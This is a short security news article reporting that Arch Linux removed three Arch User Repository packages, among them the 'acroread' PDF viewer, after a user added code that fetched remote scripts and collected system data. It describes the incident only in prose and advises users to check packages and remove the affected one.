Malicious software packages at Linux repositories

Share this…

Another sign that the user-controlled software repository should not be fully trusted

One of the most popular Linux distros, Arch Linux, has extracted up to three user-controlled repository packages after it was discovered that they were hosting malicious code, as reported by experts in secure data destruction from the International Institute of Cyber Security.

Arch Linux is a general-purposed, independently developed GNU/Linux distro, predominantly composed of free and open source software, and allows community involvement.

In addition to official repositories such as Arch Build System (ABS), Arch Linux users can also download software packages from other repositories, including Arch User repository (AUR), a community-maintained repository created and managed by Arch Linux users.

Since AUR packages are user-developed content, those who maintain Arch always suggest Linux users carefully review all files, especially PKGBUILD and any .installfile, for malicious codes. In any case, it was discovered that this AUR repository hosted malicious code in various forms, including a PDF reader.

Compromised PDF reader found in Arch User Repository                    

Last June, a malicious user nicknamed ‘xeactor’ adopted an orphan package (software without active managers) called ‘acroread’ that works as a PDF viewer and modified it adding malicious code that would download a script, which in turn would install and run another script from a remote server.

This script installs persistent software that intrudes with “systemd” and reconfigures it, and will run every 360 seconds.

Specialists in secure data destruction claim that the malicious script would be used to collect information from the infected system such as:

  • Date and time
  • Computer ID
  • Package Management Utility Information

The data collected would be published in a Pastebin file.

Fortunately, a code analysis discovered the changes in due time and revealed that scripts did not seem to be a serious threat. Experts in secure data destruction claim that as soon as it was discovered, the AUR managers reverse the changes made in the package, suspended ‘xeactor’ account and also found two packages more that the user had adopted and modified recently.

A lot of malicious software packages more

The AUR team also eliminated the other two packages without revealing their names.

If you are a user of Arch Linux who downloaded ‘ acroread ‘ recently, we recommend that you remove it as soon as possible.

Even when this flaw is not a serious threat to Linux users, the incident definitely generated a discussion about the security of untrusted software packages.

Linux users are encouraged to remain alert to the use of code developed by unrecognized users.